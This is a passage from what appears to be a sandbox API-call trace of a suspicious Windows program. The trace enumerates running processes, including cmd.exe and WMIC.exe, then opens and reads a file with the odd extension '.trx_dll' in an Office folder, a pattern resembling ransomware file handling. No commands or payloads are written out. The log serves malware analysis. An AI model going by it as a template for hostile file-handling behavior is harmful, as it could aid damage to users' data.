th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.806] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.807] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.808] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.810] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.811] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.812] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.813] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.815] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.816] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.817] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.818] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.820] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.908] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.910] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0173.911] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0173.912] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0173.913] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0173.914] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0173.916] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0173.917] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0173.918] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: 
lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0173.919] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0173.921] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0173.922] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0173.923] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0173.924] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0173.925] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0173.926] Process32NextW (in: hSnapshot=0x120, 
lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0173.927] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0173.929] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0173.930] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0173.931] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0173.932] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.933] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.935] 
Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0173.936] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0173.937] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0173.938] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdf4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.939] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.940] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xe7c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0173.941] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.942] 
Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.943] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.944] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.945] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.946] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0174.067] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0174.068] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.069] Process32NextW (in: 
hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.070] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.071] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0174.072] CloseHandle (hObject=0x120) returned 1 [0174.072] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.072] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.072] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23086160735) returned 1 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer 
(in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x110678 [0174.074] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: 
lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x110b60 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x110b60 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.276] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.276] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.302] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
